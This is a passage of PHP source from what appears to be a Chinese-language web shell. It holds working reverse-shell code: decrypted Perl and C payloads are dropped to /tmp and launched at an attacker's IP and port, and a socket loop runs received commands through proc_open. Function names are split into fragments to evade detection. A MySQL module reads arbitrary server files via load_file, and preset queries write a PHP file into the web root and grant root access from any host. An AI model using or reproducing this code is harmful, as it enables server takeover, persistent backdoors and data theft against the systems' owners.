'; if ($GLOBALS['_POST']['use'] == '1') { $pl_code = StringHandler::getCode('pgone'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ' , 'wb' , Decrypt::run($pl_code)) ? '创建/tmp/dyAeLWNJ成功
' : '创建/tmp/dyAeLWNJ失败
'; $perl_path = Foundation::DeMarcia('which perl'); $perl_path = $perl_path ? chop($perl_path) : 'perl'; @unlink('/tmp/dyAeLWNJ.c'); Foundation::DeMarcia($perl_path . ' /tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &'); $result .= '母舰呼叫完成,请检查通讯结果。'; } if ($GLOBALS['_POST']['use'] == '2') { $c_code = StringHandler::getCode('gai'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ.c' , 'wb' , Decrypt::run($c_code)) ? '创建/tmp/dyAeLWNJ.c成功
' : '创建/tmp/dyAeLWNJ.c失败
'; Foundation::DeMarcia('gcc -o /tmp/dyAeLWNJ /tmp/dyAeLWNJ.c'); @unlink('/tmp/dyAeLWNJ.c'); $result .= Foundation::DeMarcia('/tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &') ? 'nc -vv -l ' . $target_port : '执行命令失败'; } if ($GLOBALS['_POST']['use'] == '3') { if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or self::$htmlClass->tips("缺少相关模块" , '/?action=flyj'); } else { @dl('sockets.so') or self::$htmlClass->tips("缺少模块" , '/?action=flyj'); } } if ($system == "WIN") { $env = ['path' => 'c:\\windows\\system32']; } else { $env = ['PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin']; } $desc = [ 0 => ["pipe" , "r"] , 1 => ["pipe" , "w"] , 2 => ["pipe" , "w"] , ]; $host = gethostbyname($target_ip); $proto = getprotobyname("tcp"); $a = 'soc' . 'ket' . '_' . 'cre' . 'ate'; if (($sock = $a(AF_INET , SOCK_STREAM , $proto)) < 0) { die("与主舰的通讯建立失败"); } if (($ret = socket_connect($sock , $host , $target_port)) < 0) { die("通讯建立失败"); } else { $cwd = str_replace('\\' , '/' , dirname(__FILE__)); while ($cmd = socket_read($sock , 65535 , $proto)) { $process = proc_open($cmd , $desc , $pipes , $cwd , $env); if (is_resource($process)) { fwrite($pipes[0] , $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock , $msg , strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock , $msg , strlen($msg)); proc_close($process); } } } } if ($GLOBALS['_POST']['use'] == '4') { $result .= '
'; $fp = fsockopen($target_ip , $target_port , $errno , $errstr); if (!$fp) { $result .= "无法打开socket连接"; } else { $username = get_current_user(); $file_path = THEPATH; $host = $_SERVER['SERVER_NAME']; while (!feof($fp)) { $b = 'fp' . 'uts'; $b($fp , " [$username@$host:$file_path]# "); $result = fgets($fp , 4096); $message = Foundation::DeMarcia($result); $b($fp , " --> " . $message . "\n"); } fclose($fp); } $result .= '
'; } } return $result; } public function moneyManage () { $message = ''; $money_return = ''; $flag = isset($GLOBALS['_POST']['host']) && isset($GLOBALS['_POST']['user']); $target_host = $flag ? Decrypt::run($GLOBALS['_POST']['host']) : 'localhost'; $target_user = $flag ? Decrypt::run($GLOBALS['_POST']['user']) : 'root'; $target_pass = $flag ? Decrypt::run($GLOBALS['_POST']['pass']) : ''; $target_name = $flag ? Decrypt::run($GLOBALS['_POST']['data']) : 'mysql'; $target_port = $flag ? Decrypt::run($GLOBALS['_POST']['port']) : '3306'; $sql = $flag ? Decrypt::run($GLOBALS['_POST']['content']) : 'select version();'; $ap = 'mys' . 'ql_co' . 'nnent'; $ao = 'mys' . 'ql_se' . 'lect_db'; $ai = 'my' . 'sq' . 'l_qu' . 'ery'; $au = 'my' . 'sq' . 'l_fe' . 'tch_ar' . 'ray'; $ay = 'm' . 'ys' . 'ql_er' . 'ror'; if ($flag) { if ($conn = mysql_connect($target_host . ':' . $target_port , $target_user , $target_pass)) { @$ao($target_name); } else { self::$htmlClass->tips('连接MYSQL失败' , '?action=sjcx'); } } $down_file = 'c:/windows/homework/kaydenkdross.avi'; if (!empty($GLOBALS['_POST']['downfile'])) { $down_file = self::$fileClass->filePathFormat(urldecode(Decrypt::run(urldecode($GLOBALS['_POST']['downfile'])))); $bin_path = bin2hex($down_file); $query = "select load_file(0x$bin_path)"; if ($money_return = @$ai($query , $conn)) { $k = 0; $down_code = ''; while ($row = @$au($money_return)) { $down_code .= $row[$k]; $k ++; } if ($down_code) { $file_down = basename($down_file); if (!$file_down) $file_down = 'envl.tmp'; $array = explode('.' , $file_down); $array_end = array_pop($array); header('Content-type: application/x-' . $array_end); header('Content-Disposition: attachment; filename=' . $file_down); header('Content-Length: ' . strlen($down_code)); echo $down_code; exit; } else { self::$htmlClass->tips("文件查询失败,请检查 mysql secure-file-priv 配置" , "?action=sjcx&type=d"); } } else self::$htmlClass->tips("文件下载失败" , "?action=sjcx&type=d"); } $type = isset($GLOBALS['_GET']['type']) ? 
$GLOBALS['_GET']['type'] : ''; $result = <<
function nFull(i){Str = new Array(11);Str[0] = "select version();";Str[1] = "select *** FROM user into outfile 'D:/web/iis.txt'";Str[2] = "select '' into outfile 'F:/web/123.php';";Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";nform.content.value = Str[i];return true;}